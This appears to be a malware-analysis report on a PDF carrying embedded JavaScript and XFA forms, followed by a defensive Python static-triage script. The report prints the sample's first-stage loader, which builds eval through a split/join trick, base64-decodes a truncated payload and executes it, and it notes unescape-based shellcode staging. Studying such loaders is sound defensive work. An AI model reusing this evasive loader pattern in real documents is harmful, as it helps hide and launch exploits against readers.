Malware Insights
The PDF fires several heuristics for embedded JavaScript and XFA forms. The carved script javascript_obj0012_000.js is a loader: it builds eval indirectly (new Function over a split/join-assembled string), base64-decodes a large literal and executes the result, so the document is clearly intended to run code that its first stage hides. The visible prefix of that literal decodes to ` var JMkb = unescape; var gdo = JMkb( "%u4141`, i.e. unescape applied to %u-encoded data, which is how reader exploits normally stage shellcode and NOP sleds in memory; that matches the exploit-cluster rule below. A download-and-execute second stage is not evidenced: the only extracted URLs are XFA/XDP namespace identifiers and bitstream.com, all of benign reputation, so any network component would have to sit inside the still-encoded payload. Confidence is moderate for that reason: the verdict rests on the script's structure and on partial decoding of the blob rather than on specific IOCs.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (6)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) {`. Note that the matched line is the String.fromCharCode call of an ordinary base64 decoder, which on its own is benign; the critical rating comes from its co-occurrence with the indirect eval and the encoded blob the decoder feeds it.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- XFA form (low) PDF_XFA: PDF uses XML Forms Architecture, which can contain script logic.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.bitstream.com (referenced by PDF JavaScript)
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

javascript_obj0012_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 12 at offset 0xA0B3
- Size: 3815 bytes
- SHA-256: 177b6f534acb1e0047eb4f1ea3e256f278c1e1cb04a03fff8c0d13444d37ebce
Detection
- ClamAV: no threats found.
- Obfuscation or payload: likely. The carved artifact contains 4 eval/decoder/string-building tokens, and 45 of 62 identifiers look randomly generated (e.g. 'YyIgKTsgd2hpbGUgKGVjLmxlbmd0aCArIDIwICsg'), which the analyzer reads as name-mangling obfuscation. Caveat: the quoted example is not an identifier but a 40-character slice of the base64 literal s that the tokenizer counted as a name; it decodes to `c" ); while (ec.length + 20 + `, a fragment of the second stage. The identifiers actually present in the preview (eva, decode, enc1..enc4, chr1..chr3, output) are short and readable, so the mangling ratio overstates the obfuscation, while the decoded fragment is itself further evidence that the blob is code rather than data.
Preview script (first 1,000 lines of the extracted script)

The first stage is short. Line 1 builds eval without the literal token: "ev al (a);" is split on spaces and re-joined, so a byte scan for eval finds nothing while new Function still receives the body eval(a);. The base64 literal s carries the second stage (truncated in this preview). decode is a textbook base64 decoder, but it references this._keyStr and Base64._utf8_decode, neither of which appears in the preview. The commented-out line is an alternative unpacking path (string reversal) left behind by the author; the live path decodes s and hands the result to the constructed eval.

```javascript
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s='IHZhciBKTWtiID0gdW5lc2NhcGU7IHZhciBnZG8gPSBKTWtiKCAiJXU0MTQx…';
function decode(input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    input = input.replace(/[^A-Za-z0-9+/=]/g, "");
    while (i < input.length) {
        enc1 = this._keyStr.indexOf(input.charAt(i++));
        enc2 = this._keyStr.indexOf(input.charAt(i++));
        enc3 = this._keyStr.indexOf(input.charAt(i++));
        enc4 = this._keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        if (enc3 != 64) {
            output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
            output = output + String.fromCharCode(chr3);
        }
    }
    output = Base64._utf8_decode(output);
    return output;
}
//eva(s.split("").reverse().join(""));
eva(decode(s));
```
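The checks above (staged eval, base64 payload, identifier mangling) can be reproduced statically without running the script. The following Python pass is an added example, not the analyzer's own code and not part of the sample; it runs on a constructed snippet that keeps the first stage's structure with the base64 literal cut to the 60 characters visible in the preview. The staging-token list, the identifier thresholds and the regexes are assumptions. It goes beyond the analyzer's reported checks in two ways: identifiers are counted only outside string literals and comments, so the payload blob does not inflate the mangling ratio, and staging tokens are counted over the decoded layer as well, which is where unescape and the %u4141 pattern surface.

```python
"""Static triage of a JavaScript stream carved from a PDF, without running it.

Added example, not the analyzer's code. Token list, thresholds and the
constructed sample below are assumptions made for illustration.
"""
import base64
import binascii
import math
import re
from collections import Counter

# Staging tokens to count; an assumed list, not the analyzer's rule set.
STAGING_TOKENS = ("eval", "unescape", "fromCharCode", "charCodeAt", "Function")

# JavaScript keywords excluded from the identifier tally (assumed subset).
JS_RESERVED = {
    "var", "let", "const", "function", "return", "new", "if", "else",
    "while", "for", "this", "true", "false", "null", "typeof", "in",
}

# Constructed sample modelled on the extracted script's first stage; the
# base64 literal is the 60-character prefix visible in the preview.
SAMPLE_JS = r'''
var eva=new Function("a","ev al (a);".split(" ").join(""));
var s='IHZhciBKTWtiID0gdW5lc2NhcGU7IHZhciBnZG8gPSBKTWtiKCAiJXU0MTQx';
function decode(input) { return input; } // stand-in for the base64 decoder
eva(decode(s));
'''

_SPLIT_JOIN = re.compile(
    r'"([^"]*)"\s*\.split\(\s*"([^"]*)"\s*\)\s*\.join\(\s*"([^"]*)"\s*\)')
_B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{32,}={0,2})['"]""")
_STRINGS_AND_COMMENTS = re.compile(
    r"""'[^'\\]*(?:\\.[^'\\]*)*'|"[^"\\]*(?:\\.[^"\\]*)*"|/\*.*?\*/|//[^\n]*""",
    re.DOTALL)
_IDENT = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")


def fold_split_join(src):
    """Statically evaluate each "x y".split("sep").join("glue") idiom and
    return the strings it produces (the sample builds 'eval(a);' this way)."""
    folded = []
    for literal, sep, glue in _SPLIT_JOIN.findall(src):
        parts = list(literal) if sep == "" else literal.split(sep)
        folded.append(glue.join(parts))
    return folded


def decode_base64_literals(src):
    """Return (literal, decoded_text) for each base64-looking string literal
    that decodes cleanly; literals with a bad alphabet or padding are skipped."""
    found = []
    for literal in _B64_LITERAL.findall(src):
        try:
            raw = base64.b64decode(literal, validate=True)
        except binascii.Error:
            continue
        found.append((literal, raw.decode("latin-1")))
    return found


def shannon_entropy(text):
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_mangled(name):
    """Assumed heuristic: a long, high-entropy name that also flips case
    repeatedly or carries digits reads as generated rather than written."""
    if len(name) < 8 or shannon_entropy(name) <= 3.5:
        return False
    case_flips = sum(1 for a, b in zip(name, name[1:])
                     if a.isalpha() and b.isalpha() and a.islower() != b.islower())
    return case_flips >= 3 or any(ch.isdigit() for ch in name)


def identifier_stats(src):
    """Count identifiers outside strings and comments, and how many look mangled."""
    code_only = _STRINGS_AND_COMMENTS.sub(" ", src)
    names = [n for n in _IDENT.findall(code_only) if n not in JS_RESERVED]
    return {"identifiers": len(names), "mangled": sum(map(looks_mangled, names))}


def triage(src):
    """Run every check and return a findings dict; the script is never evaluated."""
    folded = fold_split_join(src)
    payloads = decode_base64_literals(src)
    # Count staging tokens over the source plus each decoded layer, so tokens
    # that only exist in the next stage (here 'unescape') are surfaced.
    haystack = src + "\n" + "\n".join(text for _, text in payloads)
    tokens = {t: len(re.findall(r"\b%s\b" % re.escape(t), haystack))
              for t in STAGING_TOKENS}
    return {
        "staged_eval": any("eval" in f for f in folded),
        "folded_strings": folded,
        "payload_prefixes": [text[:48] for _, text in payloads],
        "staging_tokens": tokens,
        "unicode_escape_blob": any(re.search(r"%u[0-9A-Fa-f]{4}", text)
                                   for _, text in payloads),
        **identifier_stats(src),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

On the constructed sample the raw token scan reports zero occurrences of eval, which is exactly the blind spot the split/join trick targets; folding recovers eval(a); and decoding the literal exposes unescape and the %u4141 run that the exploit-cluster rule keys on. Run it against the real carved file by passing its contents to triage() instead of SAMPLE_JS; nothing in the pass executes the script.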
font_00_sfnt_off0000033c.bin
- Kind: pdf-font-stream
- Source: PDF embedded font (sfnt) at offset 0x33C
- Size: 65932 bytes
- SHA-256: 3b64a0f7caca6fadf42df0668be5fc7c5363642b7d8b50c0bda676ffc437c6a6